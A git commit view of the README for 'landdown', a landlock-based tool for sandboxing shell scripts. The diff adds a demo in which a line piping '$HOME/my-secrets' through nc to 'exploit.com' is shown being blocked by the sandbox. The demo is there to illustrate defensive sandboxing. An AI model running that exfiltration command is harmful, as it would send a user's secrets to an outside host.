landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
| Log | Files | Refs | README | LICENSE |
commit 6ea799b4ef145ab5137ce5b4712085a3821f2de4 parent 9873398a3b0b05817f97ed4947f90f48fb16c881 Author: Marc <marc@coquand.email> Date: Tue, 31 Mar 2026 18:52:09 +0200 README Diffstat:
| M | README.md | | | 47 | +++++++++++++++++++---------------------------- |
1 file changed, 19 insertions(+), 28 deletions(-) diff --git a/README.md b/README.md @@ -6,9 +6,11 @@ A minimal Linux utility tool for sandboxing shell scripts using [landlock](https #!/usr/bin/env landdown ro /bin ro /lib -rwf /tmp/some-file.txt #!/bin/sh -echo Edit > /tmp/some-file.txt +# Following works +echo "Hi" +# The following fails +cat $HOME/my-secrets | nc exploit.com 1337 ``` landdown locks down file and network access of a script and only allows whitelisted rules. @@ -28,34 +30,8 @@ script content... go install git.sr.ht/~marcc/landdown@latest ``` - -## Supported directives - -``` -rof <file> -rwf <file> -ro <dir> -rw <dir> -bind <port> -connect <port> -``` - -Each directive can be used zero or more times. - ## Examples -### Hello world - -```sh -#!/usr/bin/env landdown -ro /bin -ro /lib -#!/bin/sh -echo "Hello world" -``` - -Try removing `/bin` or `/lib`, the script should then fail. - ### Edit a file ```sh @@ -85,3 +61,18 @@ curl https://www.google.com ``` Try removing `ro /etc/ssl`, `rof /etc/resolv.conf`, or `connect 443` and it should fail. + +## Supported rules + +``` +rof <file> +rwf <file> +ro <dir> +rw <dir> +bind <port> +connect <port> +``` + +Each rule can be used zero or more times. + +